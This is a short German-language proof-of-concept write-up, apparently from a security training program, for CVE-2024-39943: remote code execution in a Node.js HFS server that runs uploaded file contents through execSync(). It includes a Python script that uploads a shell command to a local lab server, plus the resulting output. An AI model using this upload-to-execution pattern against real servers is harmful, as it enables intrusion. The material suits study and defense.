
Proof-of-Concept-Exploit für CVE-2024-39943, der die Remote-Code-Ausführung durch Dateiupload in einem Node.js-HFS-Server mittels child_process.execSync() demonstriert.
WhiteHat School 3. Generation – Jeongmin Roh (@JenmrR)
In einer Node.js-basierten HFS-Serverumgebung existiert eine Schwachstelle, bei der der Inhalt hochgeladener Dateien mit child_process.execSync() ausgeführt wird.
Ein Angreifer kann über die Datei-Upload-Funktion direkt Betriebssystembefehle ausführen und die Ergebnisse interner Befehle einsehen oder das System steuern.
Dies ist die Schwachstelle CVE-2024-39943, die das gleiche Bedrohungsniveau wie eine Befehlsinjektion (Remote Code Execution) aufweist.
/upload und führt den Inhalt der hochgeladenen Dateien direkt als Befehl aus$ sudo docker-compose up --build -d
$ python3 poc.py
import requests
payload = 'echo Hello_From_Hacked_Server'
files = { 'file': ('exploit.txt', payload) }
r = requests.post('http://localhost:8080/upload', files=files)
print(r.text)
Serverantwort nach PoC-Ausführung:
Executed:
Hello_From_Hacked_Server

execSync() stellt ein erhebliches Sicherheitsrisiko dar.